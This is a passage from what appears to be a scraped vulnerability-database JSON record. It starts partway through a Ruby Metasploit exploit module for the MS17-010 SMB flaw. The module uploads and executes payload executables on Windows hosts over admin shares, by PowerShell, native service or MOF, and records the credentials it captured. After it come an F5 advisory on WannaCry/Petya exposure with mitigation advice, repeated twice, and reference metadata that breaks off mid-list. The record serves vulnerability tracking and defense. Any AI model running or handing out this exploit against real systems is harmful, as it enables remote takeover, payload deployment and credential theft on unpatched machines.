},\r\n 'Platform' => 'win',\r\n 'Arch' => [ARCH_X86, ARCH_X64],\r\n 'Targets' =>\r\n [\r\n [ 'Automatic', { } ],\r\n [ 'PowerShell', { } ],\r\n [ 'Native upload', { } ],\r\n [ 'MOF upload', { } ]\r\n ],\r\n 'DefaultTarget' => 0,\r\n 'DisclosureDate' => 'Mar 14 2017'\r\n ))\r\n\r\n register_options(\r\n [\r\n OptString.new('SHARE', [ true, \"The share to connect to, can be an admin share (ADMIN$,C$,...) 
or a normal read/write folder share\", 'ADMIN$' ])\r\n ])\r\n\r\n register_advanced_options(\r\n [\r\n OptBool.new('ALLOW_GUEST', [true, \"Keep trying if only given guest access\", false]),\r\n OptString.new('SERVICE_FILENAME', [false, \"Filename to to be used on target for the service binary\",nil]),\r\n OptString.new('PSH_PATH', [false, 'Path to powershell.exe', 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe']),\r\n OptString.new('SERVICE_STUB_ENCODER', [false, \"Encoder to use around the service registering stub\",nil])\r\n ])\r\n end\r\n\r\n def exploit\r\n begin\r\n eternal_pwn(datastore['RHOST'])\r\n smb_pwn()\r\n\r\n rescue ::Msf::Exploit::Remote::SMB::Client::Psexec_MS17_010::MS17_010_Error => e\r\n print_error(\"#{e.message}\")\r\n rescue ::Errno::ECONNRESET,\r\n ::Rex::Proto::SMB::Exceptions::LoginError,\r\n ::Rex::HostUnreachable,\r\n ::Rex::ConnectionTimeout,\r\n ::Rex::ConnectionRefused => e\r\n print_error(\"#{e.class}: #{e.message}\")\r\n rescue => error\r\n print_error(error.class.to_s)\r\n print_error(error.message)\r\n print_error(error.backtrace.join(\"\\n\"))\r\n ensure\r\n eternal_cleanup() # restore session\r\n end\r\n end\r\n\r\n def smb_pwn()\r\n case target.name\r\n when 'Automatic'\r\n if powershell_installed?\r\n print_status('Selecting PowerShell target')\r\n powershell\r\n else\r\n print_status('Selecting native target')\r\n native_upload\r\n end\r\n when 'PowerShell'\r\n powershell\r\n when 'Native upload'\r\n native_upload\r\n when 'MOF upload'\r\n mof_upload\r\n end\r\n\r\n handler\r\n end\r\n\r\n\r\n # TODO: Again, shamelessly copypasta from the psexec exploit module. 
Needs to\r\n # be moved into a mixin\r\n\r\n def powershell_installed?\r\n share = \"\\\\\\\\#{datastore['RHOST']}\\\\#{datastore['SHARE']}\"\r\n\r\n case datastore['SHARE'].upcase\r\n when 'ADMIN$'\r\n path = 'System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'\r\n when 'C$'\r\n path = 'Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe'\r\n else\r\n path = datastore['PSH_PATH']\r\n end\r\n\r\n simple.connect(share)\r\n\r\n vprint_status(\"Checking for #{path}\")\r\n\r\n if smb_file_exist?(path)\r\n vprint_status('PowerShell found')\r\n psh = true\r\n else\r\n vprint_status('PowerShell not found')\r\n psh = false\r\n end\r\n\r\n simple.disconnect(share)\r\n\r\n psh\r\n end\r\n\r\n def powershell\r\n ENV['MSF_SERVICENAME'] = datastore['SERVICE_NAME']\r\n command = cmd_psh_payload(payload.encoded, payload_instance.arch.first)\r\n\r\n if datastore['PSH::persist'] and not datastore['DisablePayloadHandler']\r\n print_warning(\"You probably want to DisablePayloadHandler and use exploit/multi/handler with the PSH::persist option\")\r\n end\r\n\r\n # Execute the powershell command\r\n print_status(\"Executing the payload...\")\r\n begin\r\n psexec(command)\r\n rescue StandardError => exec_command_error\r\n fail_with(Failure::Unknown, \"#{peer} - Unable to execute specified command: #{exec_command_error}\")\r\n end\r\n end\r\n\r\n def native_upload\r\n filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\r\n servicename = datastore['SERVICE_NAME'] || rand_text_alpha(8)\r\n serviceencoder = datastore['SERVICE_STUB_ENCODER'] || ''\r\n\r\n # Upload the shellcode to a file\r\n print_status(\"Uploading payload...\")\r\n smbshare = datastore['SHARE']\r\n fileprefix = \"\"\r\n # if SHARE = Users/sasha/ or something like this\r\n if smbshare =~ /.[\\\\\\/]/\r\n subfolder = true\r\n smbshare = datastore['SHARE'].dup\r\n smbshare = smbshare.gsub(/^[\\\\\\/]/,\"\")\r\n folder_list = smbshare.split(/[\\\\\\/]/)\r\n smbshare = 
folder_list[0]\r\n fileprefix = folder_list[1..-1].map {|a| a + \"\\\\\"}.join.gsub(/\\\\$/,\"\") if folder_list.length > 1\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n fd = smb_open(\"\\\\#{fileprefix}\\\\#(unknown)\", 'rwct')\r\n else\r\n subfolder = false\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n fd = smb_open(\"\\\\#(unknown)\", 'rwct')\r\n end\r\n exe = ''\r\n opts = { :servicename => servicename, :serviceencoder => serviceencoder}\r\n begin\r\n exe = generate_payload_exe_service(opts)\r\n\r\n fd << exe\r\n ensure\r\n fd.close\r\n end\r\n\r\n if subfolder\r\n print_status(\"Created \\\\#{fileprefix}\\\\#(unknown)...\")\r\n else\r\n print_status(\"Created \\\\#(unknown)...\")\r\n end\r\n\r\n # Disconnect from the share\r\n simple.disconnect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n\r\n # define the file location\r\n if datastore['SHARE'] == 'ADMIN$'\r\n file_location = \"%SYSTEMROOT%\\\\#(unknown)\"\r\n elsif datastore['SHARE'] =~ /^[a-zA-Z]\\$$/\r\n file_location = datastore['SHARE'].slice(0,1) + \":\\\\#(unknown)\"\r\n else\r\n file_location = \"\\\\\\\\127.0.0.1\\\\#{smbshare}\\\\#{fileprefix}\\\\#(unknown)\"\r\n end\r\n\r\n psexec(file_location, false)\r\n\r\n unless datastore['SERVICE_PERSIST']\r\n print_status(\"Deleting \\\\#(unknown)...\")\r\n #This is not really useful but will prevent double \\\\ on the wire :)\r\n if datastore['SHARE'] =~ /.[\\\\\\/]/\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n begin\r\n simple.delete(\"\\\\#{fileprefix}\\\\#(unknown)\")\r\n rescue XCEPT::ErrorCode => e\r\n print_error(\"Delete of \\\\#{fileprefix}\\\\#(unknown) failed: #{e.message}\")\r\n end\r\n else\r\n simple.connect(\"\\\\\\\\#{datastore['RHOST']}\\\\#{smbshare}\")\r\n begin\r\n simple.delete(\"\\\\#(unknown)\")\r\n rescue XCEPT::ErrorCode => e\r\n print_error(\"Delete of \\\\#(unknown) failed: #{e.message}\")\r\n end\r\n end\r\n end\r\n end\r\n\r\n 
def mof_upload\r\n share = \"\\\\\\\\#{datastore['RHOST']}\\\\ADMIN$\"\r\n filename = datastore['SERVICE_FILENAME'] || \"#{rand_text_alpha(8)}.exe\"\r\n\r\n # payload as exe\r\n print_status(\"Trying wbemexec...\")\r\n print_status(\"Uploading Payload...\")\r\n if datastore['SHARE'] != 'ADMIN$'\r\n print_error('Wbem will only work with ADMIN$ share')\r\n return\r\n end\r\n simple.connect(share)\r\n exe = generate_payload_exe\r\n fd = smb_open(\"\\\\system32\\\\#(unknown)\", 'rwct')\r\n fd << exe\r\n fd.close\r\n print_status(\"Created %SystemRoot%\\\\system32\\\\#(unknown)\")\r\n\r\n # mof to cause execution of above\r\n mofname = rand_text_alphanumeric(14) + \".MOF\"\r\n mof = generate_mof(mofname, filename)\r\n print_status(\"Uploading MOF...\")\r\n fd = smb_open(\"\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\", 'rwct')\r\n fd << mof\r\n fd.close\r\n print_status(\"Created %SystemRoot%\\\\system32\\\\wbem\\\\mof\\\\#{mofname}\")\r\n\r\n # Disconnect from the ADMIN$\r\n simple.disconnect(share)\r\n end\r\n\r\n def report_auth\r\n service_data = {\r\n address: ::Rex::Socket.getaddress(datastore['RHOST'],true),\r\n port: datastore['RPORT'],\r\n service_name: 'smb',\r\n protocol: 'tcp',\r\n workspace_id: myworkspace_id\r\n }\r\n\r\n credential_data = {\r\n origin_type: :service,\r\n module_fullname: self.fullname,\r\n private_data: datastore['SMBPass'],\r\n username: datastore['SMBUser'].downcase\r\n }\r\n\r\n if datastore['SMBDomain'] and datastore['SMBDomain'] != 'WORKGROUP'\r\n credential_data.merge!({\r\n realm_key: Metasploit::Model::Realm::Key::ACTIVE_DIRECTORY_DOMAIN,\r\n realm_value: datastore['SMBDomain']\r\n })\r\n end\r\n\r\n if datastore['SMBPass'] =~ /[0-9a-fA-F]{32}:[0-9a-fA-F]{32}/\r\n credential_data.merge!({:private_type => :ntlm_hash})\r\n else\r\n credential_data.merge!({:private_type => :password})\r\n end\r\n\r\n credential_data.merge!(service_data)\r\n\r\n credential_core = create_credential(credential_data)\r\n\r\n login_data = {\r\n 
access_level: 'Admin',\r\n core: credential_core,\r\n last_attempted_at: DateTime.now,\r\n status: Metasploit::Model::Login::Status::SUCCESSFUL\r\n }\r\n\r\n login_data.merge!(service_data)\r\n create_credential_login(login_data)\r\n end\r\nend\n\n# 0day.today [2018-03-01] #", "_object_type": "robots.models.zdt.ZDTBulletin", "_object_types": ["robots.models.zdt.ZDTBulletin", "robots.models.base.Bulletin"]}], "f5": [{"id": "F5:K57181937", "hash": "330bd78d90882d9853f4b96b657c390c", "type": "f5", "bulletinFamily": "software", "title": "Multiple Microsoft SMB (Wannacry/Wannacrypt/Petya/Goldeneye) vulnerabilities", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 
\n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.1.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIn addition to standard mitigation options such as patching, using antivirus programs on endpoints, and using unaffected backups, you may be able to leverage F5 products to provide additional mitigation options in the following non-exhaustive ways:\n\n * **BIG-IP LTM**\n\nFor a BIG-IP LTM system placed in the network path, in such a way as to be able to process traffic that contains the exploit, virtual servers listening on SMBv1 ports can be used to leverage iRules and/or stream profiles to inspect and block scanning and infection attempts. A stream profile and iRules-based approach for detection and blocking are being developed by resources within F5. 
Additionally, you can use packet filters to block access to SMBv1 ports at the Virtual Local Area Network (VLAN) level.\n\n * **BIG-IP DNS (formerly known as BIG-IP GTM)**\n\nThe BIG-IP DNS system can blackhole access to command and control channels and download sites.\n\n * **BIG-IP AFM**\n\nThe BIG-IP AFM system, when appropriately placed in the network path, can block access to SMBv1 ports (139, 445, etc.).\n\n * **BIG-IP APM**\n\nThe BIG-IP APM system can use L4 ACLs to block inbound and outbound traffic on Virtual Private Network (VPN) connections, and you can apply iRules to inspect traffic using a layered virtual, as with BIG-IP LTM. APM access policies can use endpoint checks to determine if the connecting device is patched appropriately, or is running an antivirus program with an up-to-date set of virus definitions. If these conditions are not met, access can be blocked. You can use a Secure Web Gateway (SWG) policy to blackhole outbound access to command and control and download sites.\n\n**Note**: The following link takes you to a resource outside of AskF5. 
The third party could remove the document without our knowledge.\n\n * [Microsoft Security Bulletin MS17-010 - Critical](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n\n * F5 Labs: [FROM NSA EXPLOIT TO WIDESPREAD RANSOMWARE: WANNACRY IS ON THE LOOSE](<https://f5.com/labs/articles/threat-intelligence/malware/from-nsa-exploit-to-widespread-ransomware-wannacry-is-on-the-loose-26847>)\n\n**Note**: For information about how to locate the following four F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\n * The **Configuring Access Control Lists** chapter of the _**BIG-IP APM: Portal Access**_ guide\n * The **About endpoint security client-side items** section of the _**BIG-IP APM: Visual Policy Editor**_ guide\n * The **Packet Filters** chapter of the _**BIG-IP TMOS: Routing Administration**_ guide\n * The _**AFM policies and implementation**_ guide\n\n**Note**: A DevCentral login is required to access the following two items.\n\n * For an example of an iApp/iRule mitigation, refer to the [WannaCry Ransomware and MS17-010 Vulnerability](<https://devcentral.f5.com/articles/wannacry-ransomware-and-ms17-010-vulnerability-26906>) DevCentral article\n * For an example of DNS blackhole with LTM and DNS services, refer to the [LTM DNS Blackhole](<https://devcentral.f5.com/codeshare/ltm-dns-blackhole>) DevCentral article \n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K17329: BIG-IP GTM name has changed to BIG-IP DNS](<https://support.f5.com/csp/article/K17329>)\n", 
"published": "2017-05-17T01:18:00", "modified": "2017-06-28T01:23:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://support.f5.com/csp/article/K57181937", "reporter": "f5", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-04-30T18:21:13", "history": [{"bulletin": {"id": "F5:K57181937", "hash": "1786d7ba1d5cbb6388b26237b2e2ed2c7b1176e43eb65bac1d2932b8173f9787", "type": "f5", "bulletinFamily": "software", "title": "Multiple Microsoft SMB (Wannacry/Wannacrypt/Petya/Goldeneye) vulnerabilities", "description": "\nF5 Product Development has evaluated the currently supported releases for potential vulnerability.\n\nTo determine if your release is known to be vulnerable, the components or features that are affected by the vulnerability, and for information about releases or hotfixes that address the vulnerability, refer to the following table:\n\nProduct| Versions known to be vulnerable| 
Versions known to be not vulnerable| Severity| Vulnerable component or feature \n---|---|---|---|--- \nBIG-IP LTM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP AAM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP AFM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP Analytics| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP APM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP ASM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP DNS| None| 13.0.0 \n12.0.0 - 12.1.2| Not vulnerable| None \nBIG-IP Edge Gateway| None| 11.2.1| Not vulnerable| None \nBIG-IP GTM| None| 11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP Link Controller| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1 \n11.2.1| Not vulnerable| None \nBIG-IP PEM| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.4.0 - 11.6.1| Not vulnerable| None \nBIG-IP PSM| None| 11.4.0 - 11.4.1| Not vulnerable| None \nBIG-IP WebAccelerator| None| 11.2.1| Not vulnerable| None \nBIG-IP WebSafe| None| 13.0.0 \n12.0.0 - 12.1.2 \n11.6.0 - 11.6.1| Not vulnerable| None \nARX| None| 6.2.0 - 6.4.0| Not vulnerable| None \nEnterprise Manager| None| 3.1.1| Not vulnerable| None \nBIG-IQ Cloud| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Device| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ Security| None| 4.4.0 - 4.5.0| Not vulnerable| None \nBIG-IQ ADC| None| 4.5.0| Not vulnerable| None \nBIG-IQ Centralized Management| None| 5.0.0 - 5.2.0 \n4.6.0| Not vulnerable| None \nBIG-IQ Cloud and Orchestration| None| 1.0.0| Not vulnerable| None \nF5 iWorkflow| None| 2.0.0 - 2.1.0| Not vulnerable| None \nLineRate| None| 2.5.0 - 2.6.2| Not vulnerable| None \nTraffix SDC| None| 5.0.0 - 5.1.0 \n4.0.0 - 4.4.0| Not vulnerable| None\n\nIn addition to standard mitigation options such as patching, using antivirus programs 
on endpoints, and using unaffected backups, you may be able to leverage F5 products to provide additional mitigation options in the following non-exhaustive ways:\n\n * **BIG-IP LTM**\n\nFor a BIG-IP LTM system placed in the network path, in such a way as to be able to process traffic that contains the exploit, virtual servers listening on SMBv1 ports can be used to leverage iRules and/or stream profiles to inspect and block scanning and infection attempts. A stream profile and iRules-based approach for detection and blocking are being developed by resources within F5. Additionally, you can use packet filters to block access to SMBv1 ports at the Virtual Local Area Network (VLAN) level.\n\n * **BIG-IP DNS (formerly known as BIG-IP GTM)**\n\nThe BIG-IP DNS system can blackhole access to command and control channels and download sites.\n\n * **BIG-IP AFM**\n\nThe BIG-IP AFM system, when appropriately placed in the network path, can block access to SMBv1 ports (139, 445, etc.).\n\n * **BIG-IP APM**\n\nThe BIG-IP APM system can use L4 ACLs to block inbound and outbound traffic on Virtual Private Network (VPN) connections, and you can apply iRules to inspect traffic using a layered virtual, as with BIG-IP LTM. APM access policies can use endpoint checks to determine if the connecting device is patched appropriately, or is running an antivirus program with an up-to-date set of virus definitions. If these conditions are not met, access can be blocked. You can use a Secure Web Gateway (SWG) policy to blackhole outbound access to command and control and download sites.\n\n**Note**: The following link takes you to a resource outside of AskF5. 
The third party could remove the document without our knowledge.\n\n * [Microsoft Security Bulletin MS17-010 - Critical](<https://technet.microsoft.com/en-us/library/security/ms17-010.aspx>) \n\n * F5 Labs: [FROM NSA EXPLOIT TO WIDESPREAD RANSOMWARE: WANNACRY IS ON THE LOOSE](<https://f5.com/labs/articles/threat-intelligence/malware/from-nsa-exploit-to-widespread-ransomware-wannacry-is-on-the-loose-26847>)\n\n**Note**: For information about how to locate the following four F5 product guides, refer to [K12453464: Finding product documentation on AskF5](<https://support.f5.com/csp/article/K12453464>).\n\n * The **Configuring Access Control Lists** chapter of the _**BIG-IP APM: Portal Access**_ guide\n * The **About endpoint security client-side items** section of the _**BIG-IP APM: Visual Policy Editor**_ guide\n * The **Packet Filters** chapter of the _**BIG-IP TMOS: Routing Administration**_ guide\n * The _**AFM policies and implementation**_ guide\n\n**Note**: A DevCentral login is required to access the following two items.\n\n * For an example of an iApp/iRule mitigation, refer to the [WannaCry Ransomware and MS17-010 Vulnerability](<https://devcentral.f5.com/articles/wannacry-ransomware-and-ms17-010-vulnerability-26906>) DevCentral article\n * For an example of DNS blackhole with LTM and DNS services, refer to the [LTM DNS Blackhole](<https://devcentral.f5.com/codeshare/ltm-dns-blackhole>) DevCentral article \n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K17329: BIG-IP GTM name has changed to BIG-IP DNS](<https://support.f5.com/csp/article/K17329>)\n", 
"published": "2017-05-17T01:18:00", "modified": "2017-06-28T01:23:00", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "cvss2": {}, "cvss3": {}, "href": "https://support.f5.com/csp/article/K57181937", "reporter": "f5", "references": [], "cvelist": ["CVE-2017-0144", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "immutableFields": [], "lastseen": "2019-04-30T18:21:13", "history": [], "viewCount": 22, "enchantments": {"dependencies": {"modified": "2019-04-30T18:21:13", "references": [{"idList": ["KITPLOIT:9146046356497464176"], "type": "kitploit"}, {"idList": ["QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"], "type": "qualysblog"}, {"idList": ["KLA10977"], "type": "kaspersky"}, {"idList": ["KB4013389", "KB4012598"], "type": "mskb"}, {"idList": ["AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"], "type": "attackerkb"}, {"idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37", "TRENDMICROBLOG:90481B7D0C6FD15C950712E718E29E3A"], "type": "trendmicroblog"}, {"idList": ["MS17_010", "ETERNALBLUE"], "type": "canvas"}, {"idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"], "type": "carbonblack"}, {"idList": ["RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607"], "type": "rapid7community"}, {"idList": ["SMNTC-96705", "SMNTC-96709", "SMNTC-96707", "SMNTC-96706", "SMNTC-96704", "SMNTC-96703"], "type": "symantec"}, {"idList": ["CVE-2017-0144", 
"CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0146", "CVE-2017-0143", "CVE-2017-0145"], "type": "cve"}, {"idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:64F70C2A6C3961CA44A77286E5B810CD", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"], "type": "saint"}, {"idList": ["PACKETSTORM:146236", "PACKETSTORM:154690", "PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:142603", "PACKETSTORM:156196"], "type": "packetstorm"}, {"idList": ["THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:18A54BDD63D7DC2B3284D326E6510150", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2"], "type": "thn"}, {"idList": ["SSV:92952", "SSV:92964"], "type": "seebug"}, {"idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"], "type": "talosblog"}, {"idList": ["THREATPOST:C95C260596C8EA3C1F60B8BCC0360A41", "THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5"], "type": "threatpost"}, {"idList": ["MYHACK58:62201786371"], "type": "myhack58"}, {"idList": ["NMAP:SMB-VULN-MS17-010.NSE"], "type": "nmap"}, {"idList": ["1337DAY-ID-27802", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-33895", "1337DAY-ID-27613", "1337DAY-ID-29702"], "type": "zdt"}, {"idList": ["MS:CVE-2017-0148", "MS:CVE-2017-0145", "MS:CVE-2017-0144", "MS:CVE-2017-0143"], "type": "mscve"}, {"idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:FECB9309EE6D84976C56C12C05F1CD02", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8"], "type": "mmpc"}, {"idList": ["MALWAREBYTES:5BE2B1A9C552FAA033E4D4312076FD34", "MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"], "type": "malwarebytes"}, {"idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698"], "type": 
"openvas"}, {"idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:42030", "EDB-ID:41891", "EDB-ID:42031", "EDB-ID:43970"], "type": "exploitdb"}, {"idList": ["MS17-010.NASL", "SMB_NT_MS17-010.NASL"], "type": "nessus"}, {"idList": ["MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0145/"], "type": "metasploit"}, {"idList": ["HUAWEI-SA-20170513-01-WINDOWS"], "type": "huawei"}], "rev": 2}, "score": {"modified": "2019-04-30T18:21:13", "rev": 2, "value": 6.4, "vector": "NONE"}}, "objectVersion": "1.6", "affectedSoftware": []}, "different_elements": ["cvss3", "cvss2"], "edition": 1, "lastseen": "2019-04-30T18:21:13"}], "viewCount": 23, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1", "AKB:D476227F-C4B1-49E3-9947-897077E5150D"]}, {"type": "zdt", "idList": ["1337DAY-ID-33895", "1337DAY-ID-27786", "1337DAY-ID-27752", "1337DAY-ID-33313", "1337DAY-ID-29702", "1337DAY-ID-27613"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", 